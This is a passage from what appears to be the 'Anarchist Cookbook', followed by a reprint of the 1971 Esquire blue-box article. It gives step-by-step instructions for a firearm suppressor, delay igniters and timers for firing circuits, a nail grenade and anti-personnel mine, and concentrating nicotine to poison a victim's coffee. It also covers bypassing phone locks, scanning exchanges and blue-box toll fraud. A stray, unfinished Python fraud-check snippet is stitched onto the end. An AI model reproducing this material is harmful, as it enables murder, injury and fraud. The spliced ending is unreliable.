5.Separate the top half of the grenade container from the bottom half. 6.Insert the pipe nipple in the drilled hole at the base of the bottom half of the container. Pack the absorbent cotton inside the container and around the pipe nipple. 7.Pack the absorbent cotton in top half of grenade container leaving hole in center. Assemble container to the bottom half. 8.Thread the other coupling onto the pipe nipple. Note: A longer container and pipe nipple, with same "A" and "B" dimensions as those given, will further reduce the signature of the system. How to use: 1.Thread the low signature system on the selected weapon securely. 2.Place the proper cotton wad size into the muzzle end of the system (see table 2) 3.Load weapon 4.Weapon is now ready for use TABLE 1 Low Signature System Dimensions Coupling Holes per 4 rows A B C D Row Total .45 cal 3/8in in 3/8in 3/8in 12 48 .38 cal 3/8in in in in 12 48 9 mm 3/8in in in in 12 48 7.62 mm 3/8in in in in 12 48 .22 cal in 5/32in 1/8*in 1/8in 14 50 * Extra Heavy Pipe TABLE 2 Cotton Wadding Sizes Weapon Cotton Wadding Size .45 cal 1-« x 6 inches .38 cal 1 x 4 inches 9 mm 1 x 4 inches 7.62 mm 1 x 4 inches .22 cal Not needed 142.Delay Igniter from a Cigarette by The Jolly Roger A simple and economical (everyone wants to save money haha) time delay can be made with a common cigarette. Materials Required: · Cigarette · Paper match · String (shoelace or similar cord) · Fuse cord (improvised or commercial) Procedure: 1.Cut end of fuse cord at a slant to expose inner core 2.Light cigarette in normal fashion. Place a paper match so that the had is over exposed end of fuse cord and tie both to the side of the burning cigarette with string. 3.Position the burning cigarette with fuse so that it burns freely. A suggested method is to hang the delay on a twig. Note: Common dry cigarettes burn about 1 inch every 7 or 8 minutes in still air. 
(Now I am talking about all except American brands, which burn about 1 inch every 4-5 minutes) If the fuse cord is place one inch from the burning end of the cigarette a time delay of 7 or 8 minutes will result. Delay time will vary depending upon type of cigarette, wind, moisture, and other atmospheric conditions (get to know your cigarette!) To obtain accurate delay time, a test run should be made under "use" conditions. 143.Nicotine by The Jolly Roger Nicotine is an abundant poison. Easily found in tobacco products, in concentrated form a few drops can quickly kill someone. Here is how to concentrate it: First get a can of chewing tobacco or pipe tobacco. Remove the contents and soak in water overnight in a jar (about 2/3 cup of water will do...). In the morning, strain into another jar the mixture through a porous towel. Then wrap the towel around the ball of tobacco and squeeze it until all of the liquid is in the jar. Throw away the tobacco--you will not need it anymore. Now you have two options. I recommend the first. It makes the nicotine more potent. 1.Allow to evaporate until a sticky syrup results in the jar. This is almost pure nicotine (hell, it is pure enough for sure!). 2.Heat over low flame until water is evaporated and a thick sticky syrup results (I don't know how long it takes... shouldn't take too long, though.). Now all you have to do, when you wish to use it, is to put a few drops in a medicine dropper or equivalent, and slip about 4 or 5 drops into the victim's coffee. Coffee is recommended since it will disguise the taste. Since nicotine is a drug, the victim should get quite a buzz before they turn their toes up to the daisies, so to speak. Note: If the syrup is too sticky, dilute it with a few drops of water. And while you are at it, better add an extra drop to the coffee just to be sure! 144.Dried Seed Timer by The Jolly Roger A time delay device for electrical firing circuits can be made using the principle of expansion of dried seeds. 
Material Required: · Dried peas, beans, or other dehydrated seeds · Wide-mouth glass jar with non-metal cap · Two screws or bolts · Thin metal plate · Hand drill · Screwdriver Procedure: 1.Determine the rate of the rise of the dried seeds selected. This is necessary to determine the delay time of the timer. · Place a sample of the dried seeds in the jar and cover with water. · Measure the time it takes for the seeds to rise a given height. Most dried seeds increase 50% in one to two hours. 2.Cut a disc from thin metal plate. Disc should fit loosely inside the jar. NOTE: If metal is painted, rusty, or otherwise coated, it must be scraped or sanded to obtain a clean metal surface 3.Drill two holes in the cap of the jar about 2 inches apart. Diameter of holes should be such that screws or bolts will thread tightly into them. If the jar has a metal cap or no cap, a piece of wood or plastic (NOT METAL) can be used as a cover. 4.Turn the two screws or bolts through the holes in the cap. Bolts should extend about one in. (2 « cm) into the jar. IMPORTANT: Both bolts must extend the same distance below the container cover. 5.Pour dried seeds into the container. The level will depend upon the previously measured rise time and the desired delay. 6.Place the metal disc in the jar on top of the seeds. How to use: 1.Add just enough water to completely cover the seeds and place the cap on the jar. 2.Attach connecting wires from the firing circuit to the two screws on the cap. Expansion of the seeds will raise the metal disc until it contacts the screws and closes the circuit. 145.Nail Grenade by The Jolly Roger Effective fragmentation grenades can be made from a block of TNT or other blasting explosive and nails. 
Material Required: · Block of TNT or other blasting explosive · Nails · Non-electric (military or improvised) blasting cap · Fuse Cord · Tape, string, wire, or glue Procedure: 1.If an explosive charge other than a standard TNT block is used, make a hole in the center of the charge for inserting the blasting cap. TNT can be drilled with relative safety. With plastic explosives, a hole can be made by pressing a round stick into the center of the charge. The hole should be deep enough that the blasting cap is totally within the explosive. 2.Tape, tie, or glue one or two rows of closely packed nails to the sides of the explosive block. Nails should completely cover the four surfaces of the block. 3.Place blasting cap on one end of the fuse cord and crimp with pliers. NOTE: To find out how long the fuse cord should be, check the time it takes a known length to burn. If 12 inches (30 cm) burns for 30 seconds, a 10 second delay will require a 4 inch (10 cm) fuse. 4.Insert the blasting cap in the hole in the block of explosive. Tape or tie fuse cord securely in place so that it will not fall out when the grenade is thrown. Alternate Use: An effective directional anti-personnel mine can be made by placing nails on only one side of the explosive block. For the case, and electric blasting cap can be used. 146.The Bell Glossary by The Jolly Roger ACD: Automatic Call Distributor - A system that automatically distributes calls to operator pools (providing services such as intercept and directory assistance), to airline ticket agents, etc. Administration: The tasks of record-keeping, monitoring, rearranging, prediction need for growth, etc. AIS: Automatic Intercept System - A system employing an audio-response unit under control of a processor to automatically provide pertinent info to callers routed to intercept. Alert: To indicate the existence of an incoming call, (ringing). 
ANI: Automatic Number Identification - Often pronounced "Annie," a facility for automatically identify the number of the calling party for charging purposes. Appearance: A connection upon a network terminal, as in "the line has two network appearances." Attend: The operation of monitoring a line or an incoming trunk for off-hook or seizure, respectively. Audible: The subdued "image" of ringing transmitted to the calling party during ringing; not derived from the actual ringing signal in later systems. Backbone Route: The route made up of final-group trunks between end offices in different regional center areas. BHC: Busy Hour Calls - The number of calls placed in the busy hour. Blocking: The ratio of unsuccessful to total attempts to use a facility; expresses as a probability when computed a priority. Blocking Network: A network that, under certain conditions, may be unable to form a transmission path from one end of the network to the other. In general, all networks used within the Bell Systems are of the blocking type. Blue Box: Equipment used fraudulently to synthesize signals, gaining access to the toll network for the placement of calls without charge. BORSCHT Circuit: A name for the line circuit in the central office. It functions as a mnemonic for the functions that must be performed by the circuit: Battery, Overvoltage, Ringing, Supervision, Coding, Hybrid, and Testing. Busy Signal: (Called-line-busy) An audible signal which, in the Bell System, comprises 480hz and 620hz interrupted at 60IPM. Bylink: A special high-speed means used in crossbar equipment for routing calls incoming from a step-by-step office. Trunks from such offices are often referred to as "bylink" trunks even when incoming to noncrossbar offices; they are more properly referred to as "dc incoming trunks." Such high-speed means are necessary to assure that the first incoming pulse is not lost. Cable Vault: The point which phone cable enters the Central Office building. 
CAMA: Centralized Automatic Message Accounting - Pronounced like Alabama.
CCIS: Common Channel Interoffice Signaling - Signaling information for trunk connections over a separate, nonspeech data link rather than over the trunks themselves.
CCITT: International Telegraph and Telephone Consultative Committee - An international committee that formulates plans and sets standards for intercountry communication means.
CDO: Community Dial Office - A small, usually rural office typically served by step-by-step equipment.
CO: Central Office - Comprises a switching network and its control and support equipment. Occasionally improperly used to mean "office code."
Centrex: A service comparable in features to PBX service but implemented with some (Centrex CU) or all (Centrex CO) of the control in the central office. In the latter case, each station's loop connects to the central office.
Customer Loop: The wire pair connecting a customer's station to the central office.
DDD: Direct Distance Dialing - Dialing without operator assistance over the nationwide intertoll network.
Direct Trunk Group: A trunk group that is a direct connection between a given originating and a given terminating office.
EOTT: End Office Toll Trunking - Trunking between end offices in different toll center areas.
ESB: Emergency Service Bureau - A centralized agency to which 911 "universal" emergency calls are routed.
ESS: Electronic Switching System - A generic term used to identify, as a class, stored-program switching systems such as the Bell System's No.1, No.2, No.3, No.4, or No.5.
ETS: Electronic Translation Systems - An electronic replacement for the card translator in 4A Crossbar systems. Makes use of the SPC 1A Processor.
False Start: An aborted dialing attempt.
Fast Busy: (often called reorder) - An audible busy signal interrupted at twice the rate of the normal busy signal; sent to the originating station to indicate that the call was blocked due to busy equipment.
Final Trunk Group: The trunk group to which calls are routed when available high-usage trunks overflow; these groups generally "home" on an office next highest in the hierarchy.
Full Group: A trunk group that does not permit rerouting off-contingent foreign traffic; there are seven such offices.
Glare: The situation that occurs when a two-way trunk is seized more or less simultaneously at both ends.
High Usage Trunk Group: The appellation for a trunk group that has alternate routes via other similar groups, and ultimately via a final trunk group to a higher ranking office.
Intercept: The agency (usually an operator) to which calls are routed when made to a line recently removed from service, or in some other category requiring explanation. Automated versions (AIS) with automatic voice response units are growing in use.
Interrupt: The interruption on a phone line to disconnect and connect with another station, such as an Emergency Interrupt.
Junctor: A wire or circuit connection between networks in the same office. The functional equivalent to an intraoffice trunk.
MF: Multi-Frequency - The method of signaling over a trunk making use of the simultaneous application of two out of six possible frequencies.
NPA: Numbering Plan Area.
ONI: Operator Number Identification - The use of an operator in a CAMA office to verbally obtain the calling number of a call originating in an office not equipped with ANI.
PBX: Private Branch Exchange - (PABX: Private Automatic Branch Exchange) A telephone office serving a private customer. Typically, access to the outside telephone network is provided.
Permanent Signal: A sustained off-hook condition without activity (no dialing or ringing or completed connection); such a condition tends to tie up equipment, especially in earlier systems. Usually accidental, but sometimes used intentionally by customers in high-crime-rate areas to ward off burglars.
POTS: Plain Old Telephone Service - Basic service with no extra "frills".
ROTL: Remote Office Test Line - A means for remotely testing trunks.
RTA: Remote Trunk Arrangement - An extension to the TSPS system permitting its services to be provided up to 200 miles from the TSPS site.
SF: Single Frequency. A signaling method for trunks: 2600 Hz is impressed upon idle trunks.
Supervise: To monitor the status of a call.
SxS: (Step-by-Step or Strowger switch) - An electromechanical office type utilizing a gross-motion stepping switch as a combination network and distributed control.
Talkoff: The phenomenon of accidental synthesis of a machine-intelligible signal by human voice causing an unintended response. "whistling a tone".
Trunk: A path between central offices; in general 2-wire for interlocal, 4-wire for intertoll.
TSPS: Traffic Service Position System - A system that provides, under stored-program control, efficient operator assistance for toll calls. It does not switch the customer, but provides a bridge connection to the operator.
X-bar: (Crossbar) - An electromechanical office type utilizing a "fine-motion" coordinate switch and a multiplicity of central controls (called markers). There are four varieties:
· No.1 Crossbar: Used in large urban office application; (1938)
· No.3 Crossbar: A small system started in (1974).
· No.4A/4M Crossbar: A 4-wire toll machine; (1943).
· No.5 Crossbar: A machine originally intended for relatively small suburban applications; (1948)
Crossbar Tandem: A machine used for interlocal office switching.

147.Phone Dial Locks -- How to Beat'em by The Jolly Roger

Have you ever been in an office or somewhere and wanted to make a free phone call but some asshole put a lock on the phone to prevent out-going calls? Fret no more phellow phreak, for every system can be beaten with a little knowledge! There are two ways to beat this obstacle. The first is to pick the lock; I don't have the time to teach locksmithing, so we go to the second method, which takes advantage of telephone electronics.
To put it as simply as possible: when you pick up the phone you complete a circuit known as a local loop. When you hang up you break the circuit. When you dial (pulse) it also breaks the circuit, but not long enough to hang up! So you can "Push-dial." To do this you >>> RAPIDLY <<< depress the switchhook. For example, to dial an operator (and then give her the number you want to call) >>> RAPIDLY <<< & >>> EVENLY <<< depress the switchhook 10 times. To dial 634-1268, depress 6 X's, pause, then 3 X's, pause, then 4 X's, etc. It takes a little practice but you'll get the hang of it. Try practicing with your own # so you'll get a busy tone when right. It'll also work on touch-tone since a DTMF line will also accept pulse. Also, never depress the switchhook for more than a second or it'll hang up! Finally, remember that you have just as much right to that phone as the asshole who put the lock on it!

148.Exchange Scanning by The Jolly Roger

Almost every exchange in the Bell System has test #'s and other "goodies" such as loops with dial-ups. These "goodies" are usually found between 9900 and 9999 in your local exchange. If you have the time and initiative, scan your exchange and you may become lucky! Here are some findings in the 914-268 exchange:
9900 - ANI
9901 - ANI
9927 - OSC. TONE (POSSIBLE TONE SIDE OF A LOOP)
9936 - VOICE # TO THE TELCO CENTRAL OFFICE
9937 - VOICE # TO THE TELCO CENTRAL OFFICE
9941 - COMPUTER (DIGITAL VOICE TRANSMISSION?)
9960 - OSC. TONE (TONE SIDE LOOP) MAY ALSO BE A COMPUTER IN SOME EXCHANGES
9961 - NO RESPONSE (OTHER END OF LOOP?)
9962 - NO RESPONSE (OTHER END OF LOOP?)
9963 - NO RESPONSE (OTHER END OF LOOP?)
9966 - COMPUTER (SEE 9941)
9968 - TONE THAT DISAPPEARS--RESPONDS TO CERTAIN TOUCH-TONE KEYS
Most of the numbers between 9900 & 9999 will ring or go to a "what #, please?" operator.

149.A Short History of Phreaking by The Jolly Roger

Well now we know a little vocabulary, and now it's into history, Phreak history.
Back at MIT in 1964 arrived a student by the name of Stewart Nelson, who was extremely interested in the telephone. Before entering MIT, he had built autodialers, cheese boxes, and many more gadgets. But when he came to MIT he became even more interested in "fone-hacking" as they called it. After a little while he naturally started using the PDP-1, the school's computer at that time, and from there he decided that it would be interesting to see whether the computer could generate the frequencies required for blue boxing. The hackers at MIT were not interested in ripping off Ma Bell, but just exploring the telephone network. Stew (as he was called) wrote a program to generate all the tones and set off into the vast network. Now there were more people phreaking than the ones at MIT. Most people have heard of Captain Crunch (no, not the cereal). He also discovered how to take rides through the fone system, with the aid of a small whistle found in a cereal box (can we guess which one?). By blowing this whistle, he generated the magical 2600 Hz and into the mouthpiece it sailed, giving him complete control over the system. I have heard rumors that at one time he made about of the calls coming out of San Francisco. He got famous fast. He made the cover of People magazine and was interviewed several times (as you'll soon see). Well, he finally got caught after a long adventurous career. After he was caught he was put in jail and was beaten up quite badly because he would not teach other inmates how to box calls. After getting out, he joined Apple Computer and is still out there somewhere. Then there was Joe the Whistler, blind from the day he was born. He could whistle a perfect 2600 Hz tone. It was rumored phreaks used to call him to tune their boxes. Well, that was up to about 1970. Then from 1970 to 1979, phreaking was mainly done by college students, businessmen and anyone who knew enough about electronics and the fone company to make a 555 IC generate those magic tones.
Businessmen and a few college students mainly just blue boxed to get free calls. The others were still there, exploring 800#'s and the new ESS systems. ESS posed a big problem for phreaks then and an even bigger one now. ESS was not widespread, but where it was, blue boxing was next to impossible except for the most experienced phreak. Today ESS is installed in almost all major cities and blue boxing is getting harder and harder. 1978 marked a change in phreaking: the Apple ][, now a computer that was affordable, could be programmed, and could save all that precious work on a cassette. Then just a short while later came the Apple Cat modem. With this modem, generating all blue box tones was as easy as writing a program to count from one to ten (a little exaggerated). Pretty soon programs that could imitate an operator just as well as the real thing were hitting the community; TSPS and Cat's Meow are the standard now and are the best. 1982-1986: LD services were starting to appear in mass numbers. People now had programs to hack LD services, telephone exchanges, and even passwords. By now many phreaks were getting extremely good and BBS's started to spring up everywhere, each having many documentations on phreaking for the novice. Then it happened: the movie War Games was released and mass numbers of sixth graders to all ages flocked to see it. The problem wasn't that the movie was bad, it was that now EVERYONE wanted to be a hacker/phreak. Novices came out in such mass numbers that bulletin boards started to be busy 24 hours a day. To this day, they still have not recovered. Other problems started to occur: novices guessed easy passwords on large government computers and started to play around... Well, it wasn't long before they were caught. I think that many people remember the 414-hackers. They were so stupid as to say "yes" when the computer asked them whether they'd like to play games. Well, at least it takes the heat off the real phreaks/hackers/crackers.

150."Secrets of the Little Blue Box" by Ron Rosenbaum

Dudes... These four files contain the story, "Secrets of the Little Blue Box". -A story so incredible it may even make you feel sorry for the phone company- Printed in the October 1971 issue of Esquire Magazine. If you happen to be in a library and come across a collection of Esquire magazines, the October 1971 issue is the first issue printed in the smaller format. The story begins on page 116 with a picture of a blue box. --One Farad Cap, Atlantic Anarchist Guild

The Blue Box Is Introduced: Its Qualities Are Remarked

I am in the expensively furnished living room of Al Gilbertson (His real name has been changed.), the creator of the "blue box." Gilbertson is holding one of his shiny black-and-silver "blue boxes" comfortably in the palm of his hand, pointing out the thirteen little red push buttons sticking up from the console. He is dancing his fingers over the buttons, tapping out discordant beeping electronic jingles. He is trying to explain to me how his little blue box does nothing less than place the entire telephone system of the world, satellites, cables and all, at the service of the blue-box operator, free of charge. "That's what it does. Essentially it gives you the power of a super operator. You seize a tandem with this top button," he presses the top button with his index finger and the blue box emits a high-pitched cheep, "and like that" -- cheep goes the blue box again -- "you control the phone company's long-distance switching systems from your cute little Princess phone or any old pay phone. And you've got anonymity. An operator has to operate from a definite location: the phone company knows where she is and what she's doing. But with your beeper box, once you hop onto a trunk, say from a Holiday Inn 800 (toll-free) number, they don't know where you are, or where you're coming from, they don't know how you slipped into their lines and popped up in that 800 number.
They don't even know anything illegal is going on. And you can obscure your origins through as many levels as you like. You can call next door by way of White Plains, then over to Liverpool by cable, and then back here by satellite. You can call yourself from one pay phone all the way around the world to a pay phone next to you. And you get your dime back too." "And they can't trace the calls? They can't charge you?" "Not if you do it the right way. But you'll find that the free-call thing isn't really as exciting at first as the feeling of power you get from having one of these babies in your hand. I've watched people when they first get hold of one of these things and start using it, and discover they can make connections, set up crisscross and zigzag switching patterns back and forth across the world. They hardly talk to the people they finally reach. They say hello and start thinking of what kind of call to make next. They go a little crazy." He looks down at the neat little package in his palm. His fingers are still dancing, tapping out beeper patterns. "I think it's something to do with how small my models are. There are lots of blue boxes around, but mine are the smallest and most sophisticated electronically. I wish I could show you the prototype we made for our big syndicate order." He sighs. "We had this order for a thousand beeper boxes from a syndicate front man in Las Vegas. They use them to place bets coast to coast, keep lines open for hours, all of which can get expensive if you have to pay. The deal was a thousand blue boxes for $300 apiece. Before then we retailed them for $1500 apiece, but $300,000 in one lump was hard to turn down. We had a manufacturing deal worked out in the Philippines. Everything ready to go. Anyway, the model I had ready for limited mass production was small enough to fit inside a flip-top Marlboro box. It had flush touch panels for a keyboard, rather than these unsightly buttons, sticking out. 
Looked just like a tiny portable radio. In fact, I had designed it with a tiny transistor receiver to get one AM channel, so in case the law became suspicious the owner could switch on the radio part, start snapping his fingers, and no one could tell anything illegal was going on. I thought of everything for this model -- I had it lined with a band of thermite which could be ignited by radio signal from a tiny button transmitter on your belt, so it could be burned to ashes instantly in case of a bust. It was beautiful. A beautiful little machine. You should've seen the faces on these syndicate guys when they came back after trying it out. They'd hold it in their palm like they never wanted to let it go, and they'd say, 'I can't believe it. I can't believe it.' You probably won't believe it until you try it."

The Blue Box Is Tested: Certain Connections Are Made

About eleven o'clock two nights later Fraser Lucey has a blue box in the palm of his left hand and a phone in the palm of his right. He is standing inside a phone booth next to an isolated shut-down motel off Highway 1. I am standing outside the phone booth. Fraser likes to show off his blue box for people. Until a few weeks ago when Pacific Telephone made a few arrests in his city, Fraser Lucey liked to bring his blue box (This particular blue box, like most blue boxes, is not blue. Blue boxes have come to be called "blue boxes" either because 1) The first blue box ever confiscated by phone-company security men happened to be blue, or 2) To distinguish them from "black boxes." Black boxes are devices, usually a resistor in series, which, when attached to home phones, allow all incoming calls to be made without charge to one's caller.) to parties. It never failed: A few cheeps from his device and Fraser became the center of attention at the very hippest of gatherings, playing phone tricks and doing request numbers for hours. He began to take orders for his manufacturer in Mexico. He became a dealer.
Fraser is cautious now about where he shows off his blue box. But he never gets tired of playing with it. "It's like the first time every time," he tells me. Fraser puts a dime in the slot. He listens for a tone and holds the receiver up to my ear. I hear the tone. Fraser begins describing, with a certain practiced air, what he does while he does it. "I'm dialing an 800 number now. Any 800 number will do. It's toll free. Tonight I think I'll use the ----- (he names a well-known rent-a-car company) 800 number. Listen, it's ringing. Here, you hear it? Now watch." He places the blue box over the mouthpiece of the phone so that the one silver and twelve black push buttons are facing up toward me. He presses the silver button -- the one at the top -- and I hear that high-pitched beep. "That's 2600 cycles per second to be exact," says Lucey. "Now, quick. Listen." He shoves the earpiece at me. The ringing has vanished. The line gives a slight hiccough, there is a sharp buzz, and then nothing but soft white noise. "We're home free now," Lucey tells me, taking back the phone and applying the blue box to its mouthpiece once again. "We're up on a tandem, into a long-lines trunk. Once you're up on a tandem, you can send yourself anywhere you want to go." He decides to check out London first. He chooses a certain pay phone located in Waterloo Station. This particular pay phone is popular with the phone-phreaks network because there are usually people walking by at all hours who will pick it up and talk for a while. He presses the lower left-hand corner button which is marked "KP" on the face of the box. "That's Key Pulse. It tells the tandem we're ready to give it instructions. First I'll punch out KP 182 START, which will slide us into the overseas sender in White Plains." I hear a neat clunk-cheep. "I think we'll head over to England by satellite. Cable is actually faster and the connection is somewhat better, but I like going by satellite. So I just punch out KP Zero 44.
The Zero is supposed to guarantee a satellite connection and 44 is the country code for England. Okay... we're there. In Liverpool actually. Now all I have to do is punch out the London area code which is 1, and dial up the pay phone. Here, listen, I've got a ring now." I hear the soft quick purr-purr of a London ring. Then someone picks up the phone. "Hello," says the London voice. "Hello. Who's this?" Fraser asks. "Hello. There's actually nobody here. I just picked this up while I was passing by. This is a public phone. There's no one here to answer actually." "Hello. Don't hang up. I'm calling from the United States." "Oh. What is the purpose of the call? This is a public phone you know." "Oh. You know. To check out, uh, to find out what's going on in London. How is it there?" "It's five o'clock in the morning. It's raining now." "Oh. Who are you?" The London passerby turns out to be an R.A.F. enlistee on his way back to the base in Lincolnshire, with a terrible hangover after a thirty-six-hour pass. He and Fraser talk about the rain. They agree that it's nicer when it's not raining. They say good-bye and Fraser hangs up. His dime returns with a nice clink. "Isn't that far out," he says grinning at me. "London, like that." Fraser squeezes the little blue box affectionately in his palm. "I told ya this thing is for real. Listen, if you don't mind I'm gonna try this girl I know in Paris. I usually give her a call around this time. It freaks her out. This time I'll use the ------ (a different rent-a-car company) 800 number and we'll go by overseas cable, 133; 33 is the country code for France, the 1 sends you by cable. Okay, here we go.... Oh damn. Busy. Who could she be talking to at this time?" A state police car cruises slowly by the motel. The car does not stop, but Fraser gets nervous. We hop back into his car and drive ten miles in the opposite direction until we reach a Texaco station locked up for the night. We pull up to a phone booth by the tire pump.
Fraser dashes inside and tries the Paris number. It is busy again. "I don't understand who she could be talking to. The circuits may be busy. It's too bad I haven't learned how to tap into lines overseas with this thing yet." Fraser begins to phreak around, as the phone phreaks say. He dials a leading nationwide charge card's 800 number and punches out the tones that bring him the time recording in Sydney, Australia. He beeps up the weather recording in Rome, in Italian of course. He calls a friend in Boston and talks about a certain over-the-counter stock they are into heavily. He finds the Paris number busy again. He calls up "Dial a Disc" in London, and we listen to Double Barrel by David and Ansil Collins, the number-one hit of the week in London. He calls up a dealer of another sort and talks in code. He calls up Joe Engressia, the original blind phone-phreak genius, and pays his respects. There are other calls. Finally Fraser gets through to his young lady in Paris. They both agree the circuits must have been busy, and criticize the Paris telephone system. At two-thirty in the morning Fraser hangs up, pockets his dime, and drives off, steering with one hand, holding what he calls his "lovely little blue box" in the other.

You Can Call Long Distance For Less Than You Think

"You see, a few years ago the phone company made one big mistake," Gilbertson explains two days later in his apartment. "They were careless enough to let some technical journal publish the actual frequencies used to create all their multi-frequency tones. Just a theoretical article some Bell Telephone Laboratories engineer was doing about switching theory, and he listed the tones in passing. At ----- (a well-known technical school) I had been fooling around with phones for several years before I came across a copy of the journal in the engineering library. I ran back to the lab and it took maybe twelve hours from the time I saw that article to put together the first working blue box.
It was bigger and clumsier than this little baby, but it worked." It's all there on public record in that technical journal written mainly by Bell Lab people for other telephone engineers. Or at least it was public. "Just try and get a copy of that issue at some engineering-school library now. Bell has had them all red-tagged and withdrawn from circulation," Gilbertson tells me. "But it's too late. It's all public now. And once they became public the technology needed to create your own beeper device is within the range of any twelve-year-old kid, any twelve-year-old blind kid as a matter of fact. And he can do it in less than the twelve hours it took us. Blind kids do it all the time. They can't build anything as precise and compact as my beeper box, but theirs can do anything mine can do." "How?" "Okay. About twenty years ago AT&T made a multi-billion-dollar decision to operate its entire long-distance switching system on twelve electronically generated combinations of twelve master tones. Those are the tones you sometimes hear in the background after you've dialed a long-distance number. They decided to use some very simple tones -- the tone for each number is just two fixed single-frequency tones played simultaneously to create a certain beat frequency. Like 1300 cycles per second and 900 cycles per second played together give you the tone for digit 5. Now, what some of these phone phreaks have done is get themselves access to an electric organ. Any cheap family home-entertainment organ. Since the frequencies are public knowledge now -- one blind phone phreak has even had them recorded in one of the talking books for the blind -- they just have to find the musical notes on the organ which correspond to the phone tones. Then they tape them. For instance, to get Ma Bell's tone for the number 1, you press down organ keys F~5 and A~5 (900 and 700 cycles per second) at the same time. To produce the tone for 2 it's F~5 and C~6 (1100 and 700 cps).
The phone phreaks circulate the whole list of notes so there's no trial and error anymore." He shows me a list of the rest of the phone numbers and the two electric organ keys that produce them. "Actually, you have to record these notes at 3 3/4 inches-per-second tape speed and double it to 7 1/2 inches-per-second when you play them back, to get the proper tones," he adds. "So once you have all the tones recorded, how do you plug them into the phone system?" "Well, they take their organ and their cassette recorder, and start banging out entire phone numbers in tones on the organ, including country codes, routing instructions, 'KP' and 'Start' tones. Or, if they don't have an organ, someone in the phone-phreak network sends them a cassette with all the tones recorded, with a voice saying 'Number one,' then you have the tone, 'Number two,' then the tone and so on. So with two cassette recorders they can put together a series of phone numbers by switching back and forth from number to number. Any idiot in the country with a cheap cassette recorder can make all the free calls he wants." "You mean you just hold the cassette recorder up to the mouthpiece and switch in a series of beeps you've recorded? The phone thinks that anything that makes these tones must be its own equipment?" "Right. As long as you get the frequency within thirty cycles per second of the phone company's tones, the phone equipment thinks it hears its own voice talking to it. The original granddaddy phone phreak was this blind kid with perfect pitch, Joe Engressia, who used to whistle into the phone. An operator could tell the difference between his whistle and the phone company's electronic tone generator, but the phone company's switching circuit can't tell them apart. The bigger the phone company gets and the further away from human operators it gets, the more vulnerable it becomes to all sorts of phone phreaking."

A Guide for the Perplexed

"But wait a minute," I stop Gilbertson.
"If everything you do sounds like phone-company equipment, why doesn't the phone company charge you for the call the way it charges its own equipment?" "Okay. That's where the 2600-cycle tone comes in. I better start from the beginning." The beginning he describes for me is a vision of the phone system of the continent as thousands of webs, of long-line trunks radiating from each of the hundreds of toll switching offices to the other toll switching offices. Each toll switching office is a hive compacted of thousands of long-distance tandems constantly whistling and beeping to tandems in far-off toll switching offices. The tandem is the key to the whole system. Each tandem is a line with some relays with the capability of signaling any other tandem in any other toll switching office on the continent, either directly one-to-one or by programming a roundabout route through several other tandems if all the direct routes are busy. For instance, if you want to call from New York to Los Angeles and traffic is heavy on all direct trunks between the two cities, your tandem in New York is programmed to try the next best route, which may send you down to a tandem in New Orleans, then up to San Francisco, or down to a New Orleans tandem, back to an Atlanta tandem, over to an Albuquerque tandem and finally up to Los Angeles. When a tandem is not being used, when it's sitting there waiting for someone to make a long-distance call, it whistles. One side of the tandem, the side "facing" your home phone, whistles at 2600 cycles per second toward all the home phones serviced by the exchange, telling them it is at their service, should they be interested in making a long-distance call. The other side of the tandem is whistling 2600 cps. into one or more long-distance trunk lines, telling the rest of the phone system that it is neither sending nor receiving a call through that trunk at the moment, that it has no use for that trunk at the moment. 
"When you dial a long-distance number the first thing that happens is that you are hooked into a tandem. A register comes up to the side of the tandem facing away from you and presents that side with the number you dialed. This sending side of the tandem stops whistling 2600 into its trunk line. When a tandem stops the 2600 tone it has been sending through a trunk, the trunk is said to be "seized," and is now ready to carry the number you have dialed -- converted into multi-frequency beep tones -- to a tandem in the area code and central office you want. Now when a blue-box operator wants to make a call from New Orleans to New York he starts by dialing the 800 number of a company which might happen to have its headquarters in Los Angeles. The sending side of the New Orleans tandem stops sending 2600 out over the trunk to the central office in Los Angeles, thereby seizing the trunk. Your New Orleans tandem begins sending beep tones to a tandem it has discovered idly whistling 2600 cycles in Los Angeles. The receiving end of that LA tandem is seized, stops whistling 2600, listens to the beep tones which tell it which LA phone to ring, and starts ringing the 800 number. Meanwhile a mark made in the New Orleans office accounting tape notes that a call from your New Orleans phone to the 800 number in LA has been initiated and gives the call a code number. Everything is routine so far. But then the phone phreak presses his blue box to the mouthpiece and pushes the 2600-cycle button, sending 2600 out from the New Orleans tandem to the LA tandem. The LA tandem notices 2600 cycles are coming over the line again and assumes that New Orleans has hung up because the trunk is whistling as if idle. The LA tandem immediately ceases ringing the LA 800 number. 
But as soon as the phreak takes his finger off the 2600 button, the LA tandem assumes the trunk is once again being used because the 2600 is gone, so it listens for a new series of digit tones - to find out where it must send the call. Thus the blue-box operator in New Orleans now is in touch with a tandem in LA which is waiting like an obedient genie to be told what to do next. The blue-box owner then beeps out the ten digits of the New York number which tell the LA tandem to relay a call to New York City. Which it promptly does. As soon as your party picks up the phone in New York, the side of the New Orleans tandem facing you stops sending 2600 cycles to you and starts carrying his voice to you by way of the LA tandem. A notation is made on the accounting tape that the connection has been made on the 800 call which had been initiated and noted earlier. When you stop talking to New York a notation is made that the 800 call has ended. At three the next morning, when the phone company's accounting computer starts reading back over the master accounting tape for the past day, it records that a call of a certain length of time was made from your New Orleans home to an LA 800 number and, of course, the accounting computer has been trained to ignore those toll-free 800 calls when compiling your monthly bill. "All they can prove is that you made an 800 toll-free call," Gilbertson the inventor concludes. "Of course, if you're foolish enough to talk for two hours on an 800 call, and they've installed one of their special anti-fraud computer programs to watch out for such things, they may spot you and ask why you took two hours talking to Army Recruiting's 800 number when you're 4-F. But if you do it from a pay phone, they may discover something peculiar the next day -- if they've got a blue-box hunting program in their computer -- but you'll be a long time gone from the pay phone by then. Using a pay phone is almost guaranteed safe." 
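The after-the-fact accounting check Gilbertson describes, sketched as an added example that is not part of the Esquire article or the original file. The record layout, the sample records and both thresholds are constructed assumptions, and the check goes slightly beyond the passage by also flagging long billable calls to information (NPA-555-1212) alongside long toll-free calls.

```python
import re
from dataclasses import dataclass

# Assumed thresholds in minutes; the article only offers "two hours" as an example.
MAX_TOLL_FREE_MIN = 60
MAX_DIRECTORY_MIN = 5

NUMBER_RE = re.compile(r"^(\d{3})-(\d{3})-(\d{4})$")

# Constructed accounting records (not real data):
# originating line, origin type, dialed number, duration in minutes.
SAMPLE_TAPE = """\
504-555-0101,home,800-555-0199,120
504-555-0101,home,800-555-0199,3
504-555-0102,home,216-555-1212,125
504-555-0103,payphone,800-555-0142,95
504-555-0104,home,212-555-0170,200
504-555-0105,home,415-555-1212,2
garbled,,,
"""


@dataclass(frozen=True)
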